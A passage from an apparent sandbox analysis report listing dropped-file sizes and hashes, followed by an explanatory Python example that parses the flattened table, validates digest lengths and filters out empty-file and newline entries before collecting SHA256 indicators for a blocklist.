b87b48dcbf779b06c6ca6491cd31328cf840578d29a6327b7a44f9043ce1eb07
SHA512
c1cb5f15e2487f42d57ae0fa340e29c677fe24b44c945615ef617d77c2737ce4227d5a571547714973d263ed0a69c8893b6c51e89409261cdbedff612339d144
-
Filesize
221KB
MD5
28e855032f83adbd2d8499af6d2d0e22
SHA1
6b590325e2e465d9762fa5d1877846667268558a
SHA256
b13b29772c29ccb412d6ab360ff38525836fcf0f65be637a7945a83a446dfd5e
SHA512
e401cbd41e044ff7d557f57960d50fb821244eaa97ce1218191d58e0935f6c069e6a0ff4788ed91ead279f36ba4eddfaa08dc3de01082c41dc9c2fc3c4b0ae34
-
Filesize
4KB
MD5
abf47d44b6b5cd8701fdbd22e6bed243
SHA1
777c06411348954e6902d0c894bdac93d59208da
SHA256
4bc6059764441036962b0c0ec459b8ec4bb78a693a59964d8b79f0dc788a0754
SHA512
9dcadf596cc6e5175f48463652f8b7274cd4b69aaf7b9123aa90adc17156868fce86b781c291315a9e5b72c94965242b5796d771b1b12c81d055b39bf305ac77
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
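The dropped-file table above is the raw material for indicators, but as extracted it is awkward to consume: labels are fused to their values, many entries carry no path, and not every entry is worth pivoting on. The final entry's four digests are those of a zero-byte file, and the 1B entry (MD5 68b329da...) hashes a lone newline; neither identifies anything. The Python below is an added example, not part of the sandbox report or its tooling: it parses the flattened form into records, validates each digest's hex length, and separates usable SHA256 indicators from trivial or malformed entries. It assumes the report's conventions as seen on this page (a `-` line between records, a label either fused to its value or on its own line, a backslash-containing line as the Windows path); the two-entry sample input is constructed from entries on this page.

```python
import hashlib
import re
from dataclasses import dataclass, field

# Hex length each digest label must carry.
DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
LABELS = ("Filesize",) + tuple(DIGEST_LEN)

# Content that shows up in dropped-file tables but is useless as an indicator.
# Hashed at runtime, so the lookup doubles as a check on the report's digests.
TRIVIAL_CONTENT = {b"": "empty file", b"\n": "single newline"}


@dataclass
class DroppedFile:
    path: str = ""
    size: str = ""
    digests: dict = field(default_factory=dict)
    problems: list = field(default_factory=list)


def split_fused(line):
    """Split 'MD5d17f...' or 'Filesize46B' into (label, value); a bare label yields ''."""
    for label in LABELS:
        if line.startswith(label):
            return label, line[len(label):].strip()
    return None, None


def parse_dropped_files(text):
    """Parse the flattened report (assumed layout): '-' separates records, a label is
    fused to its value or sits on its own line, a line with a backslash is the path."""
    records, cur, pending = [], DroppedFile(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "-":
            if cur.path or cur.size or cur.digests:
                records.append(cur)
            cur, pending = DroppedFile(), None
            continue
        if pending is not None:                  # value printed on the line after its label
            label, value, pending = pending, line, None
        else:
            label, value = split_fused(line)
            if label is None:
                if not cur.path and "\\" in line:
                    cur.path = line
                else:
                    cur.problems.append(f"unrecognised line: {line!r}")
                continue
            if value == "":
                pending = label
                continue
        if label == "Filesize":
            cur.size = value
            continue
        if not re.fullmatch(r"[0-9a-fA-F]{%d}" % DIGEST_LEN[label], value):
            cur.problems.append(f"{label} has {len(value)} hex chars, expected {DIGEST_LEN[label]}")
        cur.digests[label] = value.lower()
    if cur.path or cur.size or cur.digests:
        records.append(cur)
    return records


def trivial_reason(rec):
    """Name the trivial content a record hashes (or None), cross-checking every digest
    the record carries against that content so a mis-copied hash is reported."""
    for content, why in TRIVIAL_CONTENT.items():
        if rec.digests.get("SHA256") != hashlib.sha256(content).hexdigest():
            continue
        for label, value in rec.digests.items():
            if hashlib.new(label.lower(), content).hexdigest() != value:
                rec.problems.append(f"{label} does not match the {why} it claims to be")
        return why
    return None


def triage(records):
    """Return (sorted unique SHA256 IOCs worth pivoting on, [(record, reason dropped)])."""
    iocs, dropped = set(), []
    for rec in records:
        why = trivial_reason(rec)
        if why:
            dropped.append((rec, why))
        elif rec.problems or "SHA256" not in rec.digests:
            dropped.append((rec, "; ".join(rec.problems) or "no SHA256"))
        else:
            iocs.add(rec.digests["SHA256"])
    return sorted(iocs), dropped


# Constructed sample: two entries copied from the report above, in the page's
# flattened form (fused labels, one bare 'MD5' label, one Windows path).
SAMPLE = r"""
C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Browser\profile.default\broadcast-listeners.json.tmp
Filesize209B
MD597c3738563a9448365a735f5f29ed3d5
SHA115a81433236ca6e6ecc4e1c8d0fdb8523b265c57
SHA25663221253f5c30efa214c2cd2adcf51a9c9f9a2c05f119b00a51c9579825c2c24
SHA512ed98f42d5d02ab53a9e50f80b312bed4b5d05d053bec582cf9d619ef91251e86cf4f4d1123c645500fc1dc4673b49a8b7badd3f3a39f565ac643ca4fd0157ae6
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
"""

IOCS, DROPPED = triage(parse_dropped_files(SAMPLE))
```

Running it on the sample leaves one usable indicator (the broadcast-listeners.json.tmp SHA256) and drops the empty-file entry with the reason "empty file". Fed the whole table, it also drops the 1B newline entry and reports any digest whose length does not match its label, which is the first thing to check before a hash from a flattened report goes into a blocklist.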